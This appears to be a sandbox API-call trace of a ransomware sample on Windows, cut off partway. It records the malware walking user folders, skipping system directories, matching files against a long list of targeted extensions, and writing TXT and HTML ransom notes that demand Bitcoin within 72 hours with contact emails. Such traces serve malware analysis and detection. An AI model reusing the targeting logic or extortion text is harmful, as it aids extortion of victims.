	[0198.107] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e186ed6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e186ed6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e186ed6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1a60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7qttm9h2xfj.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="7QTTM9~1.SCL")) returned 1
	[0198.107] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1
	[0198.107] lstrcmpW (lpString1="Camera Roll", lpString2="..") returned 1
	[0198.107] lstrcmpW (lpString1="Camera Roll", lpString2=".") returned 1
	[0198.107] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures"
	[0198.108] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0198.108] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="Camera Roll" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll"
	[0198.108] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll"
	[0198.108] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\"
	[0198.108] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\"
	[0198.108] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*.*"
	[0198.108] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0198.110] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*.*") returned 46
	[0198.110] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.110] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*.*", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*") returned 0x2e
	[0198.111] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.111] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="windows") returned 0x0
	[0198.111] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.111] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="boot") returned 0x0
	[0198.111] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.111] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="system volume information") returned 0x0
	[0198.111] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.112] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0198.112] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.112] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="temp") returned 0x0
	[0198.112] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.112] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="program files") returned 0x0
	[0198.112] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.112] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="program files (x86)") returned 0x0
	[0198.112] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.113] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="appdata") returned 0x0
	[0198.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.113] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="application data") returned 0x0
	[0198.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.113] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="winnt") returned 0x0
	[0198.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.113] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="tmp") returned 0x0
	[0198.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.114] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="cache") returned 0x0
	[0198.114] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.114] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="temporary internet files") returned 0x0
	[0198.114] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.114] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="webcache") returned 0x0
	[0198.114] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.114] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="inetcache") returned 0x0
	[0198.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.115] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="nvidia") returned 0x0
	[0198.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.115] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="packages") returned 0x0
	[0198.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.115] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="cookies") returned 0x0
	[0198.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.115] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\*.*", lpSrch="programdata") returned 0x0
	[0198.116] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0198.116] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b10dbc5, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0198.116] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0198.116] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0198.116] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\"
	[0198.116] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini"
	[0198.116] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini") returned 54
	[0198.116] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.117] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini", cchLength=0x36 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\desktop.ini") returned 0x36
	[0198.117] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.117] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0198.117] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\desktop.ini"
	[0198.117] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\desktop.ini") returned 54
	[0198.117] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.117] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.118] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0198.118] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.118] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0198.118] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b10dbc5, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0198.118] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0198.118] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0198.119] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll"
	[0198.119] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*.*"
	[0198.120] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.120] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.120] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\HELP_DECRYPT_YOUR_FILES.TXT") returned 70
	[0198.120] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0198.122] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0198.122] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0198.125] CloseHandle (hObject=0x384) returned 1
	[0198.126] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.126] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0198.127] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0198.127] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0198.127] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0198.128] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0198.128] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0198.128] CloseHandle (hObject=0x384) returned 1
	[0198.128] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.129] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.129] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0198.129] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\HELP_DECRYPT_YOUR_FILES.HTML") returned 71
	[0198.129] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0198.133] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo 